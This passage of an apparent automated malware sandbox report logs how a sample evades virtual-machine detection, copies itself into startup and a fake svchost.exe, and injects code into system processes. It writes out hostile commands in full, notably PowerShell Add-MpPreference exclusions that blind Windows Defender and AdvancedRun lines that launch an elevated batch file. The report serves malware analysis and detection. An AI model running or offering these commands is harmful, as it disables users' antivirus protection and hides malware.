Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6356 | Thread sleep count: 2128 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6044 | Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6532 | Thread sleep count: 83 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4036 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (20 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4508
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 732
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3716
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 409
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1482
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1661
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1842
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3022
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2067
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2247
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2367
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2128
Source: C:\Users\user\Desktop\RYhdmjjr94.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem (2 occurrences)
Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem (2 occurrences)
Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | File opened / queried: C:\WINDOWS\SysWOW64\drivers\vmmouse.sys
Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | File opened / queried: C:\WINDOWS\SysWOW64\drivers\vmhgfs.sys
Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | File opened / queried: C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys
Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (20 occurrences)
Source: C:\Users\user\Desktop\RYhdmjjr94.exe | File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\RYhdmjjr94.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Users\user\Desktop\RYhdmjjr94.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\Desktop\RYhdmjjr94.exe | File opened: C:\Users\user\
Source: C:\Users\user\Desktop\RYhdmjjr94.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Users\user\Desktop\RYhdmjjr94.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp | Binary or memory string: VMware
Source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmp | Binary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp | Binary or memory string: Win32_VideoController(Standard display types)VMwareXAEA66A3Win32_VideoController6W_5B8DNVideoController120060621000000.000000-00084.90614display.infMSBDA_XXWOD5RPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsROWC1VGM (2 occurrences)
Source: svchost.exe, 00000003.00000002.591516290.0000028F63E2A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW`Sfi
Source: RYhdmjjr94.exe, 00000000.00000000.421588081.00000000026C1000.00000004.00000001.sdmp | Binary or memory string: qi'C:\WINDOWS\system32\drivers\vmmouse.sys
Source: svchost.exe, 00000003.00000002.597424824.0000028F6964C000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: RYhdmjjr94.exe, 00000000.00000000.421588081.00000000026C1000.00000004.00000001.sdmp | Binary or memory string: qi%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: RYhdmjjr94.exe, 00000000.00000000.421588081.00000000026C1000.00000004.00000001.sdmp | Binary or memory string: VMWARE
Source: explorer.exe, 00000025.00000000.426042235.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: RYhdmjjr94.exe, 00000000.00000000.421588081.00000000026C1000.00000004.00000001.sdmp | Binary or memory string: qi&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: explorer.exe, 00000025.00000000.401671955.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
Source: svchost.exe, 00000008.00000002.590149731.000001AC2D640000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.591121994.00000217B1266000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000002.590853707.0000011227029000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmp | Binary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000025.00000000.377468561.0000000003710000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmp | Binary or memory string: VMwareVBoxARun using valid operating system
Source: RYhdmjjr94.exe, 00000000.00000000.421588081.00000000026C1000.00000004.00000001.sdmp | Binary or memory string: qi"SOFTWARE\VMware, Inc.\VMware Tools
Source: svchost.exe, 00000003.00000002.597488167.0000028F69662000.00000004.00000001.sdmp | Binary or memory string: @Hyper-V RAW
Source: svchost.exe, 00000008.00000002.589926923.000001AC2D602000.00000004.00000001.sdmp | Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmp | Binary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
Source: explorer.exe, 00000025.00000000.401671955.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000025.00000000.381827385.00000000053C4000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmp | Binary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
Source: RYhdmjjr94.exe, 00000000.00000000.421588081.00000000026C1000.00000004.00000001.sdmp | Binary or memory string: qi)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe | Code function: 5_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 2188
Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe | Process token adjusted: Debug (2 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (10 occurrences)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe | Process token adjusted: Debug (2 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe | Process token adjusted: Debug (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe | Process token adjusted: Debug (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe | Process token adjusted: Debug (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write
Injects a PE file into a foreign process
Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force (4 occurrences)
Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force (2 occurrences)
Source: C:\Users\user\Desktop\RYhdmjjr94.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force (2 occurrences)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force (6 occurrences)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force (4 occurrences)
Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force (5 occurrences)
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
                Source: C:\Users\user\Desktop\RYhdmjjr94.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: A0B008
                .NET source code references suspicious native API functionsShow sources
                Source: RYhdmjjr94.exe, CBBBDD7A/u0033F03D5CC.csReference to suspicious API methods: ('A483E8EF', 'GetProcAddress@kernel32')
                Source: RYhdmjjr94.exe, CBBBDD7A/u00311B6AE82.csReference to suspicious API methods: ('8A214BA7', 'LoadLibraryEx@kernel32.dll')
                Source: RYhdmjjr94.exe, CBBBDD7A/u0039A360D4E.csReference to suspicious API methods: ('C837F2A9', 'VirtualProtect@kernel32')
                Source: 36C95A71.exe.0.dr, CBBBDD7A/u0039A360D4E.csReference to suspicious API methods: ('C837F2A9', 'VirtualProtect@kernel32')
                Source: 36C95A71.exe.0.dr, CBBBDD7A/u00311B6AE82.csReference to suspicious API methods: ('8A214BA7', 'LoadLibraryEx@kernel32.dll')
                Source: 36C95A71.exe.0.dr, CBBBDD7A/u0033F03D5CC.csReference to suspicious API methods: ('A483E8EF', 'GetProcAddress@kernel32')
                Source: svchost.exe.0.dr, CBBBDD7A/u0033F03D5CC.csReference to suspicious API methods: ('A483E8EF', 'GetProcAddress@kernel32')
                Source: svchost.exe.0.dr, CBBBDD7A/u0039A360D4E.csReference to suspicious API methods: ('C837F2A9', 'VirtualProtect@kernel32')
                Source: svchost.exe.0.dr, CBBBDD7A/u00311B6AE82.csReference to suspicious API methods: ('8A214BA7', 'LoadLibraryEx@kernel32.dll')
                Source: 0.0.RYhdmjjr94.exe.1e0000.0.unpack, CBBBDD7A/u0033F03D5CC.csReference to suspicious API methods: ('A483E8EF', 'GetProcAddress@kernel32')
                Source: 0.0.RYhdmjjr94.exe.1e0000.0.unpack, CBBBDD7A/u00311B6AE82.csReference to suspicious API methods: ('8A214BA7', 'LoadLibraryEx@kernel32.dll')
                Source: 0.0.RYhdmjjr94.exe.1e0000.0.unpack, CBBBDD7A/u0039A360D4E.csReference to suspicious API methods: ('C837F2A9', 'VirtualProtect@kernel32')
                Source: 0.0.RYhdmjjr94.exe.1e0000.17.unpack, CBBBDD7A/u00311B6AE82.csReference to suspicious API methods: ('8A214BA7', 'LoadLibraryEx@kernel32.dll')
                Source: 0.0.RYhdmjjr94.exe.1e0000.17.unpack, CBBBDD7A/u0033F03D5CC.csReference to suspicious API methods: ('A483E8EF', 'GetProcAddress@kernel32')
                Source: 0.0.RYhdmjjr94.exe.1e0000.17.unpack, CBBBDD7A/u0039A360D4E.csReference to suspicious API methods: ('C837F2A9', 'VirtualProtect@kernel32')
                Source: 0.0.RYhdmjjr94.exe.1e0000.1.unpack, CBBBDD7A/u00311B6AE82.csReference to suspicious API methods: ('8A214BA7', 'LoadLibraryEx@kernel32.dll')
                Source: 0.0.RYhdmjjr94.exe.1e0000.1.unpack, CBBBDD7A/u0033F03D5CC.csReference to suspicious API methods: ('A483E8EF', 'GetProcAddress@kernel32')
                Source: 0.0.RYhdmjjr94.exe.1e0000.1.unpack, CBBBDD7A/u0039A360D4E.csReference to suspicious API methods: ('C837F2A9', 'VirtualProtect@kernel32')
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
